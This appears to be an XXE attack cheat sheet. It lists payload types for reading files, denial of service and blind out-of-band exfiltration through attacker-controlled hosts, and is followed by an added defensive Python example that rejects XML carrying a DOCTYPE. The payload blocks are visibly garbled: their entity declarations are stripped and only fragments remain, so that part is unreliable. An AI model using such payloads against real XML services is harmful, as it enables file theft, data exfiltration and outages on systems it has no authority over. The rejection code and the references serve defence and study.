# XML External Entity
An XML External Entity (XXE) attack is a type of attack against an application that parses XML input.
## Exploit
Basic Test
```
]>
John
&example;
```
Classic XXE
```
]>
&file;
```
Classic XXE Base64 encoded
```
%init; ]>
```
PHP Wrapper inside XXE
```
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
```
Denial of Service - Billion Laughs Attack
```
]>
&a4;
```
Blind XXE
```
]
>
&callhome;
```
XXE OOB Attack (Yunusov, 2013)
```
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
```
XXE OOB with DTD and PHP filter
```
%sp;
%param1;
]>
&exfil;
File stored on http://92.222.81.2/dtd.xml
">
```
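All of the payload families above declare their entities inside a DTD, so a service that never needs DTDs can refuse any document carrying a DOCTYPE before it reaches the real parser. The following is an added example, not part of the original cheat sheet: `parse_untrusted_xml`, `DTDForbidden` and the sample documents are hypothetical names and constructed inputs, and the check uses only Python's standard `xml.parsers.expat` and `xml.etree.ElementTree`.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Reject any document that declares a DTD, then parse it normally.

    Internal entities, external entities and parameter entities can only be
    declared inside a DTD, so refusing the DOCTYPE refuses all of them.
    """
    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # expat calls this as soon as it sees the DOCTYPE, before any
        # <!ENTITY ...> declaration in the internal subset is processed.
        raise DTDForbidden(
            f"DOCTYPE {name!r} rejected (system_id={system_id!r}, "
            f"internal_subset={bool(has_internal_subset)})"
        )

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid_doctype
    checker.Parse(data, True)   # raises DTDForbidden or expat.ExpatError
    return ET.fromstring(data)  # only reached for DTD-free, well-formed XML


# Constructed sample inputs (not taken from the page).
CLEAN = b"<user><name>John</name></user>"
INTERNAL_ENTITY = (
    b'<!DOCTYPE user [<!ENTITY example "Doe">]>'
    b"<user><name>John &example;</name></user>"
)
EXTERNAL_DTD = (
    b'<!DOCTYPE user SYSTEM "http://example.invalid/placeholder.dtd">'
    b"<user/>"
)

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN), ("internal entity", INTERNAL_ENTITY),
                       ("external DTD", EXTERNAL_DTD)]:
        try:
            root = parse_untrusted_xml(doc)
            print(f"{label}: accepted, root=<{root.tag}>")
        except DTDForbidden as exc:
            print(f"{label}: blocked, {exc}")
```

Logging the rejected `system_id` gives the detection side a record of where a blind or out-of-band attempt was pointing without the parser ever contacting it.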
## Thanks to
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html